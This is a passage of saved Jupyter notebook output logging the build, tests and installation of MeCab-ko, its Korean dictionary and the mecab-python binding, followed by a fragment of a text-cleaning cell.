-DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c learner.cpp -fPIC -DPIC -o .libs/learner.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c learner.cpp -o learner.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=compile g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o libmecab.lo libmecab.cpp\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c libmecab.cpp -fPIC -DPIC -o .libs/libmecab.o\nlibtool: compile: g++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\\\"/usr/local/etc/mecabrc\\\" -O3 -Wall -c libmecab.cpp -o libmecab.o >/dev/null 2>&1\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -no-undefined -version-info 2:0:0 -o libmecab.la -rpath /usr/local/lib viterbi.lo tagger.lo utils.lo eval.lo iconv_utils.lo dictionary_rewriter.lo dictionary_generator.lo dictionary_compiler.lo context_id.lo connector.lo nbest_generator.lo writer.lo string_buffer.lo param.lo tokenizer.lo char_property.lo dictionary.lo feature_index.lo lbfgs.lo learner_tagger.lo learner.lo libmecab.lo -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -fPIC -DPIC -shared -nostdlib /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o .libs/viterbi.o .libs/tagger.o .libs/utils.o .libs/eval.o .libs/iconv_utils.o .libs/dictionary_rewriter.o .libs/dictionary_generator.o .libs/dictionary_compiler.o .libs/context_id.o .libs/connector.o .libs/nbest_generator.o .libs/writer.o .libs/string_buffer.o .libs/param.o .libs/tokenizer.o .libs/char_property.o .libs/dictionary.o .libs/feature_index.o .libs/lbfgs.o .libs/learner_tagger.o .libs/learner.o .libs/libmecab.o -lpthread -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/local/cuda/lib64/stubs -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. -lstdc++ -lm -lc -lgcc_s /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o -O3 -Wl,-soname -Wl,libmecab.so.2 -o .libs/libmecab.so.2.0.0\nlibtool: link: (cd \".libs\" && rm -f \"libmecab.so.2\" && ln -s \"libmecab.so.2.0.0\" \"libmecab.so.2\")\nlibtool: link: (cd \".libs\" && rm -f \"libmecab.so\" && ln -s \"libmecab.so.2.0.0\" \"libmecab.so\")\nlibtool: link: ar cru .libs/libmecab.a viterbi.o tagger.o utils.o eval.o iconv_utils.o dictionary_rewriter.o dictionary_generator.o dictionary_compiler.o context_id.o connector.o nbest_generator.o writer.o string_buffer.o param.o tokenizer.o char_property.o dictionary.o feature_index.o lbfgs.o learner_tagger.o learner.o libmecab.o\nar: `u' modifier ignored since `D' is the default (see `U')\nlibtool: link: ranlib .libs/libmecab.a\nlibtool: link: ( cd \".libs\" && rm -f \"libmecab.la\" && ln -s \"../libmecab.la\" \"libmecab.la\" )\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab.o mecab.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab mecab.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab mecab.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-dict-index.o mecab-dict-index.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-dict-index mecab-dict-index.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-dict-index mecab-dict-index.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-dict-gen.o mecab-dict-gen.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-dict-gen mecab-dict-gen.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-dict-gen mecab-dict-gen.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-cost-train.o mecab-cost-train.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-cost-train mecab-cost-train.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-cost-train mecab-cost-train.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-system-eval.o mecab-system-eval.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-system-eval mecab-system-eval.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-system-eval mecab-system-eval.o ./.libs/libmecab.so -lpthread -lstdc++\ng++ -DHAVE_CONFIG_H -I. -I.. -DDIC_VERSION=102 -DMECAB_DEFAULT_RC=\"\\\"/usr/local/etc/mecabrc\\\"\" -O3 -Wall -c -o mecab-test-gen.o mecab-test-gen.cpp\n/bin/bash ../libtool --tag=CXX --mode=link g++ -O3 -Wall -o mecab-test-gen mecab-test-gen.o libmecab.la -lpthread -lpthread -lstdc++ \nlibtool: link: g++ -O3 -Wall -o .libs/mecab-test-gen mecab-test-gen.o ./.libs/libmecab.so -lpthread -lstdc++\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/src'\nMaking all in man\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[2]: Nothing to be done for 'all'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/man'\nMaking all in doc\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[2]: Nothing to be done for 'all'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nMaking all in tests\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[2]: Nothing to be done for 'all'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nMaking check in src\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/src'\nmake[1]: Nothing to be done for 'check'.\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/src'\nMaking check in man\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[1]: Nothing to be done for 'check'.\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/man'\nMaking check in doc\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[1]: Nothing to be done for 'check'.\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nMaking check in tests\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake check-TESTS\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 177\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 178x178\nemitting matrix : 100% |###########################################| \n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 83\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 84x84\nemitting matrix : 100% |###########################################| \n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 450\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 1x1\n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 162\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 3x3\nemitting matrix : 100% |###########################################| \n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 4\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 1x1\n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 11\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 1\nreading ./matrix.def ... 1x1\n\ndone!\n./pos-id.def is not found. minimum setting is used\nreading ./unk.def ... 2\nemitting double-array: 100% |###########################################| \n./model.def is not found. skipped.\n./pos-id.def is not found. minimum setting is used\nreading ./dic.csv ... 1\nreading ./matrix.def ... 1x1\n\ndone!\nPASS: run-dics.sh\nPASS: run-eval.sh\nseed/pos-id.def is not found. minimum setting is used\nreading seed/unk.def ... 40\nemitting double-array: 100% |###########################################| \nseed/model.def is not found. skipped.\nseed/pos-id.def is not found. minimum setting is used\nreading seed/dic.csv ... 4335\nemitting double-array: 100% |###########################################| \nreading seed/matrix.def ... 1x1\n\ndone!\nreading corpus ...\nNumber of sentences: 34\nNumber of features: 64108\neta: 0.00005\nfreq: 1\neval-size: 6\nunk-eval-size: 4\nthreads: 1\ncharset: EUC-JP\nC(sigma^2): 1.00000\n\niter=0 err=1.00000 F=0.35771 target=2406.28355 diff=1.00000\niter=1 err=0.97059 F=0.65652 target=1484.25231 diff=0.38318\niter=2 err=0.91176 F=0.79331 target=863.32765 diff=0.41834\niter=3 err=0.85294 F=0.89213 target=596.72480 diff=0.30881\niter=4 err=0.61765 F=0.95467 target=336.30744 diff=0.43641\niter=5 err=0.50000 F=0.96702 target=246.53039 diff=0.26695\niter=6 err=0.35294 F=0.95472 target=188.93963 diff=0.23361\niter=7 err=0.20588 F=0.99106 target=168.62665 diff=0.10751\niter=8 err=0.05882 F=0.99777 target=158.64865 diff=0.05917\niter=9 err=0.08824 F=0.99665 target=154.14530 diff=0.02839\niter=10 err=0.08824 F=0.99665 target=151.94257 diff=0.01429\niter=11 err=0.02941 F=0.99888 target=147.20825 diff=0.03116\niter=12 err=0.00000 F=1.00000 target=147.34956 diff=0.00096\niter=13 err=0.02941 F=0.99888 target=146.32592 diff=0.00695\niter=14 err=0.00000 F=1.00000 target=145.77299 diff=0.00378\niter=15 err=0.02941 F=0.99888 target=145.24641 diff=0.00361\niter=16 err=0.00000 F=1.00000 target=144.96490 diff=0.00194\niter=17 err=0.02941 F=0.99888 target=144.90246 diff=0.00043\niter=18 err=0.00000 F=1.00000 target=144.75959 diff=0.00099\niter=19 err=0.00000 F=1.00000 target=144.71727 diff=0.00029\niter=20 err=0.00000 F=1.00000 target=144.66337 diff=0.00037\niter=21 err=0.00000 F=1.00000 target=144.61349 diff=0.00034\niter=22 err=0.00000 F=1.00000 target=144.62987 diff=0.00011\niter=23 err=0.00000 F=1.00000 target=144.60060 diff=0.00020\niter=24 err=0.00000 F=1.00000 target=144.59125 diff=0.00006\niter=25 err=0.00000 F=1.00000 target=144.58619 diff=0.00004\niter=26 err=0.00000 F=1.00000 target=144.58219 diff=0.00003\niter=27 err=0.00000 F=1.00000 target=144.58059 diff=0.00001\n\nDone! writing model file ... \nmodel-ipadic.c1.0.f1.model is not a binary model. reopen it as text mode...\nreading seed/unk.def ... 40\nreading seed/dic.csv ... 4335\nemitting model-ipadic.c1.0.f1.dic/left-id.def/ model-ipadic.c1.0.f1.dic/right-id.def\nemitting model-ipadic.c1.0.f1.dic/unk.def ... 40\nemitting model-ipadic.c1.0.f1.dic/dic.csv ... 4335\nemitting matrix : 100% |###########################################| \ncopying seed/char.def to model-ipadic.c1.0.f1.dic/char.def\ncopying seed/rewrite.def to model-ipadic.c1.0.f1.dic/rewrite.def\ncopying seed/dicrc to model-ipadic.c1.0.f1.dic/dicrc\ncopying seed/feature.def to model-ipadic.c1.0.f1.dic/feature.def\ncopying model-ipadic.c1.0.f1.model to model-ipadic.c1.0.f1.dic/model.def\n\ndone!\nmodel-ipadic.c1.0.f1.dic/pos-id.def is not found. minimum setting is used\nreading model-ipadic.c1.0.f1.dic/unk.def ... 40\nemitting double-array: 100% |###########################################| \nmodel-ipadic.c1.0.f1.dic/pos-id.def is not found. minimum setting is used\nreading model-ipadic.c1.0.f1.dic/dic.csv ... 4335\nemitting double-array: 100% |###########################################| \nreading model-ipadic.c1.0.f1.dic/matrix.def ... 346x346\nemitting matrix : 100% |###########################################| \n\ndone!\n precision recall F\nLEVEL 0: 12.8959(57/442) 11.8998(57/479) 12.3779\nLEVEL 1: 12.2172(54/442) 11.2735(54/479) 11.7264\nLEVEL 2: 11.7647(52/442) 10.8559(52/479) 11.2921\nLEVEL 4: 11.7647(52/442) 10.8559(52/479) 11.2921\nPASS: run-cost-train.sh\n==================\nAll 3 tests passed\n==================\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nMaking install in src\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/src'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/src'\ntest -z \"/usr/local/lib\" || /bin/mkdir -p \"/usr/local/lib\"\n /bin/bash ../libtool --mode=install /usr/bin/install -c libmecab.la '/usr/local/lib'\nlibtool: install: /usr/bin/install -c .libs/libmecab.so.2.0.0 /usr/local/lib/libmecab.so.2.0.0\nlibtool: install: (cd /usr/local/lib && { ln -s -f libmecab.so.2.0.0 libmecab.so.2 || { rm -f libmecab.so.2 && ln -s libmecab.so.2.0.0 libmecab.so.2; }; })\nlibtool: install: (cd /usr/local/lib && { ln -s -f libmecab.so.2.0.0 libmecab.so || { rm -f libmecab.so && ln -s libmecab.so.2.0.0 libmecab.so; }; })\nlibtool: install: /usr/bin/install -c .libs/libmecab.lai /usr/local/lib/libmecab.la\nlibtool: install: /usr/bin/install -c .libs/libmecab.a /usr/local/lib/libmecab.a\nlibtool: install: chmod 644 /usr/local/lib/libmecab.a\nlibtool: install: ranlib /usr/local/lib/libmecab.a\nlibtool: finish: PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/sbin\" ldconfig -n /usr/local/lib\n----------------------------------------------------------------------\nLibraries have been installed in:\n /usr/local/lib\n\nIf you ever happen to want to link against installed libraries\nin a given directory, LIBDIR, you must either use libtool, and\nspecify the full pathname of the library, or use the `-LLIBDIR'\nflag during linking and do at least one of the following:\n - add LIBDIR to the `LD_LIBRARY_PATH' environment variable\n during execution\n - add LIBDIR to the `LD_RUN_PATH' environment variable\n during linking\n - use the `-Wl,-rpath -Wl,LIBDIR' linker flag\n - have your system administrator add LIBDIR to `/etc/ld.so.conf'\n\nSee any operating system documentation about shared libraries for\nmore information, such as the ld(1) and ld.so(8) manual pages.\n----------------------------------------------------------------------\ntest -z \"/usr/local/bin\" || /bin/mkdir -p \"/usr/local/bin\"\n /bin/bash ../libtool --mode=install /usr/bin/install -c mecab '/usr/local/bin'\nlibtool: install: /usr/bin/install -c .libs/mecab /usr/local/bin/mecab\ntest -z \"/usr/local/libexec/mecab\" || /bin/mkdir -p \"/usr/local/libexec/mecab\"\n /bin/bash ../libtool --mode=install /usr/bin/install -c mecab-dict-index mecab-dict-gen mecab-cost-train mecab-system-eval mecab-test-gen '/usr/local/libexec/mecab'\nlibtool: install: /usr/bin/install -c .libs/mecab-dict-index /usr/local/libexec/mecab/mecab-dict-index\nlibtool: install: /usr/bin/install -c .libs/mecab-dict-gen /usr/local/libexec/mecab/mecab-dict-gen\nlibtool: install: /usr/bin/install -c .libs/mecab-cost-train /usr/local/libexec/mecab/mecab-cost-train\nlibtool: install: /usr/bin/install -c .libs/mecab-system-eval /usr/local/libexec/mecab/mecab-system-eval\nlibtool: install: /usr/bin/install -c .libs/mecab-test-gen /usr/local/libexec/mecab/mecab-test-gen\ntest -z \"/usr/local/include\" || /bin/mkdir -p \"/usr/local/include\"\n /usr/bin/install -c -m 644 mecab.h '/usr/local/include'\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/src'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/src'\nMaking install in man\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[2]: Nothing to be done for 'install-exec-am'.\ntest -z \"/usr/local/share/man/man1\" || /bin/mkdir -p \"/usr/local/share/man/man1\"\n /usr/bin/install -c -m 644 mecab.1 '/usr/local/share/man/man1'\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/man'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/man'\nMaking install in doc\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[2]: Nothing to be done for 'install-exec-am'.\nmake[2]: Nothing to be done for 'install-data-am'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/doc'\nMaking install in tests\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[2]: Nothing to be done for 'install-exec-am'.\nmake[2]: Nothing to be done for 'install-data-am'.\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2/tests'\nmake[1]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[2]: Entering directory '/tmp/mecab-0.996-ko-0.9.2'\ntest -z \"/usr/local/bin\" || /bin/mkdir -p \"/usr/local/bin\"\n /usr/bin/install -c mecab-config '/usr/local/bin'\ntest -z \"/usr/local/etc\" || /bin/mkdir -p \"/usr/local/etc\"\n /usr/bin/install -c -m 644 mecabrc '/usr/local/etc'\nmake[2]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nmake[1]: Leaving directory '/tmp/mecab-0.996-ko-0.9.2'\nInstall mecab-ko-dic\nInstall mecab-ko-dic\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\n100 47.4M 100 47.4M 0 0 56.4M 0 --:--:-- --:--:-- --:--:-- 168M\nmecab-ko-dic-2.1.1-20180720/\nmecab-ko-dic-2.1.1-20180720/configure\nmecab-ko-dic-2.1.1-20180720/COPYING\nmecab-ko-dic-2.1.1-20180720/autogen.sh\nmecab-ko-dic-2.1.1-20180720/Place-station.csv\nmecab-ko-dic-2.1.1-20180720/NNG.csv\nmecab-ko-dic-2.1.1-20180720/README\nmecab-ko-dic-2.1.1-20180720/EF.csv\nmecab-ko-dic-2.1.1-20180720/MAG.csv\nmecab-ko-dic-2.1.1-20180720/Preanalysis.csv\nmecab-ko-dic-2.1.1-20180720/NNB.csv\nmecab-ko-dic-2.1.1-20180720/Person-actor.csv\nmecab-ko-dic-2.1.1-20180720/VV.csv\nmecab-ko-dic-2.1.1-20180720/Makefile.in\nmecab-ko-dic-2.1.1-20180720/matrix.def\nmecab-ko-dic-2.1.1-20180720/EC.csv\nmecab-ko-dic-2.1.1-20180720/NNBC.csv\nmecab-ko-dic-2.1.1-20180720/clean\nmecab-ko-dic-2.1.1-20180720/ChangeLog\nmecab-ko-dic-2.1.1-20180720/J.csv\nmecab-ko-dic-2.1.1-20180720/.keep\nmecab-ko-dic-2.1.1-20180720/feature.def\nmecab-ko-dic-2.1.1-20180720/Foreign.csv\nmecab-ko-dic-2.1.1-20180720/XPN.csv\nmecab-ko-dic-2.1.1-20180720/EP.csv\nmecab-ko-dic-2.1.1-20180720/NR.csv\nmecab-ko-dic-2.1.1-20180720/left-id.def\nmecab-ko-dic-2.1.1-20180720/Place.csv\nmecab-ko-dic-2.1.1-20180720/Symbol.csv\nmecab-ko-dic-2.1.1-20180720/dicrc\nmecab-ko-dic-2.1.1-20180720/NP.csv\nmecab-ko-dic-2.1.1-20180720/ETM.csv\nmecab-ko-dic-2.1.1-20180720/IC.csv\nmecab-ko-dic-2.1.1-20180720/Place-address.csv\nmecab-ko-dic-2.1.1-20180720/Group.csv\nmecab-ko-dic-2.1.1-20180720/model.def\nmecab-ko-dic-2.1.1-20180720/XSN.csv\nmecab-ko-dic-2.1.1-20180720/INSTALL\nmecab-ko-dic-2.1.1-20180720/rewrite.def\nmecab-ko-dic-2.1.1-20180720/Inflect.csv\nmecab-ko-dic-2.1.1-20180720/configure.ac\nmecab-ko-dic-2.1.1-20180720/NNP.csv\nmecab-ko-dic-2.1.1-20180720/CoinedWord.csv\nmecab-ko-dic-2.1.1-20180720/XSV.csv\nmecab-ko-dic-2.1.1-20180720/pos-id.def\nmecab-ko-dic-2.1.1-20180720/Makefile.am\nmecab-ko-dic-2.1.1-20180720/unk.def\nmecab-ko-dic-2.1.1-20180720/missing\nmecab-ko-dic-2.1.1-20180720/VCP.csv\nmecab-ko-dic-2.1.1-20180720/install-sh\nmecab-ko-dic-2.1.1-20180720/Hanja.csv\nmecab-ko-dic-2.1.1-20180720/MAJ.csv\nmecab-ko-dic-2.1.1-20180720/XSA.csv\nmecab-ko-dic-2.1.1-20180720/Wikipedia.csv\nmecab-ko-dic-2.1.1-20180720/tools/\nmecab-ko-dic-2.1.1-20180720/tools/add-userdic.sh\nmecab-ko-dic-2.1.1-20180720/tools/mecab-bestn.sh\nmecab-ko-dic-2.1.1-20180720/tools/convert_for_using_store.sh\nmecab-ko-dic-2.1.1-20180720/user-dic/\nmecab-ko-dic-2.1.1-20180720/user-dic/nnp.csv\nmecab-ko-dic-2.1.1-20180720/user-dic/place.csv\nmecab-ko-dic-2.1.1-20180720/user-dic/person.csv\nmecab-ko-dic-2.1.1-20180720/user-dic/README.md\nmecab-ko-dic-2.1.1-20180720/NorthKorea.csv\nmecab-ko-dic-2.1.1-20180720/VX.csv\nmecab-ko-dic-2.1.1-20180720/right-id.def\nmecab-ko-dic-2.1.1-20180720/VA.csv\nmecab-ko-dic-2.1.1-20180720/char.def\nmecab-ko-dic-2.1.1-20180720/NEWS\nmecab-ko-dic-2.1.1-20180720/MM.csv\nmecab-ko-dic-2.1.1-20180720/ETN.csv\nmecab-ko-dic-2.1.1-20180720/AUTHORS\nmecab-ko-dic-2.1.1-20180720/Person.csv\nmecab-ko-dic-2.1.1-20180720/XR.csv\nmecab-ko-dic-2.1.1-20180720/VCN.csv\nLooking in current directory for macros.\nconfigure.ac:2: warning: AM_INIT_AUTOMAKE: two- and three-arguments forms are deprecated. For more info, see:\nconfigure.ac:2: http://www.gnu.org/software/automake/manual/automake.html#Modernize-AM_005fINIT_005fAUTOMAKE-invocation\nchecking for a BSD-compatible install... /usr/bin/install -c\nchecking whether build environment is sane... yes\n/tmp/mecab-ko-dic-2.1.1-20180720/missing: Unknown `--is-lightweight' option\nTry `/tmp/mecab-ko-dic-2.1.1-20180720/missing --help' for more information\nconfigure: WARNING: 'missing' script is too old or missing\nchecking for a thread-safe mkdir -p... /bin/mkdir -p\nchecking for gawk... no\nchecking for mawk... mawk\nchecking whether make sets $(MAKE)... yes\nchecking whether make supports nested variables... yes\nchecking for mecab-config... /usr/local/bin/mecab-config\nchecking that generated files are newer than configure... done\nconfigure: creating ./config.status\nconfig.status: creating Makefile\n/usr/local/lib\n/sbin/ldconfig.real: /usr/local/lib/python3.7/dist-packages/ideep4py/lib/libmkldnn.so.0 is not a symbolic link\n\n/usr/local/libexec/mecab/mecab-dict-index -d . -o . -f UTF-8 -t UTF-8\nreading ./unk.def ... 13\nemitting double-array: 100% |###########################################| \nreading ./J.csv ... 416\nreading ./XPN.csv ... 83\nreading ./Symbol.csv ... 16\nreading ./CoinedWord.csv ... 148\nreading ./Hanja.csv ... 125750\nreading ./NR.csv ... 482\nreading ./Place-address.csv ... 19301\nreading ./EC.csv ... 2547\nreading ./XR.csv ... 3637\nreading ./Wikipedia.csv ... 36762\nreading ./Place.csv ... 30303\nreading ./Foreign.csv ... 11690\nreading ./XSA.csv ... 19\nreading ./VCN.csv ... 7\nreading ./IC.csv ... 1305\nreading ./ETN.csv ... 14\nreading ./NNG.csv ... 208524\nreading ./EF.csv ... 1820\nreading ./MAG.csv ... 14242\nreading ./NNBC.csv ... 677\nreading ./MAJ.csv ... 240\nreading ./ETM.csv ... 133\nreading ./XSV.csv ... 23\nreading ./NP.csv ... 342\nreading ./EP.csv ... 51\nreading ./Person-actor.csv ... 99230\nreading ./VX.csv ... 125\nreading ./VA.csv ... 2360\nreading ./VCP.csv ... 9\nreading ./NNP.csv ... 2371\nreading ./Preanalysis.csv ... 5\nreading ./Inflect.csv ... 44820\nreading ./NNB.csv ... 140\nreading ./VV.csv ... 7331\nreading ./MM.csv ... 453\nreading ./Group.csv ... 3176\nreading ./Person.csv ... 196459\nreading ./NorthKorea.csv ... 3\nreading ./Place-station.csv ... 1145\nreading ./XSN.csv ... 124\nemitting double-array: 100% |###########################################| \nreading ./matrix.def ... 3822x2693\nemitting matrix : 100% |###########################################| \n\ndone!\necho To enable dictionary, rewrite /usr/local/etc/mecabrc as \\\"dicdir = /usr/local/lib/mecab/dic/mecab-ko-dic\\\"\nTo enable dictionary, rewrite /usr/local/etc/mecabrc as \"dicdir = /usr/local/lib/mecab/dic/mecab-ko-dic\"\nmake[1]: Entering directory '/tmp/mecab-ko-dic-2.1.1-20180720'\nmake[1]: Nothing to be done for 'install-exec-am'.\n /bin/mkdir -p '/usr/local/lib/mecab/dic/mecab-ko-dic'\n /usr/bin/install -c -m 644 model.bin matrix.bin char.bin sys.dic unk.dic left-id.def right-id.def rewrite.def pos-id.def dicrc '/usr/local/lib/mecab/dic/mecab-ko-dic'\nmake[1]: Leaving directory '/tmp/mecab-ko-dic-2.1.1-20180720'\nInstall mecab-python\n/tmp /tmp/mecab-ko-dic-2.1.1-20180720\nCloning into 'mecab-python-0.996'...\nUnpacking objects: 100% (17/17), done.\n/tmp/mecab-ko-dic-2.1.1-20180720\nProcessing /tmp/mecab-python-0.996\n\u001b[33m DEPRECATION: A future pip version will change local packages to be built in-place without first copying to a temporary directory. We recommend you use --use-feature=in-tree-build to test your packages with this new behavior before it becomes the default.\n pip 21.3 will remove support for this functionality. You can find discussion regarding this at https://github.com/pypa/pip/issues/7555.\u001b[0m\nBuilding wheels for collected packages: mecab-python\n Building wheel for mecab-python (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for mecab-python: filename=mecab_python-0.996_ko_0.9.2-cp37-cp37m-linux_x86_64.whl size=141815 sha256=718db5104ac2e7534573819fde3e104d206b4d0db4adf9b2fa576da445173d5c\n Stored in directory: /root/.cache/pip/wheels/40/7b/9f/2922869bef86c3354ae7034f7a3647c573ee1997c2dad0290a\n\u001b[33m WARNING: Built wheel for mecab-python is invalid: Metadata 1.2 mandates PEP 440 version, but '0.996-ko-0.9.2' is not\u001b[0m\nFailed to build mecab-python\nInstalling collected packages: mecab-python\n Running setup.py install for mecab-python ... \u001b[?25l\u001b[?25hdone\n\u001b[33m DEPRECATION: mecab-python was installed using the legacy 'setup.py install' method, because a wheel could not be built for it. A possible replacement is to fix the wheel build issue reported above. You can find discussion regarding this at https://github.com/pypa/pip/issues/8368.\u001b[0m\nSuccessfully installed mecab-python-0.996-ko-0.9.2\nDone.\n" ], [ "article.replace('[^가-힣ㄱ-ㅎㅠ]',' ')", "_____no_output_____" ], [ "from 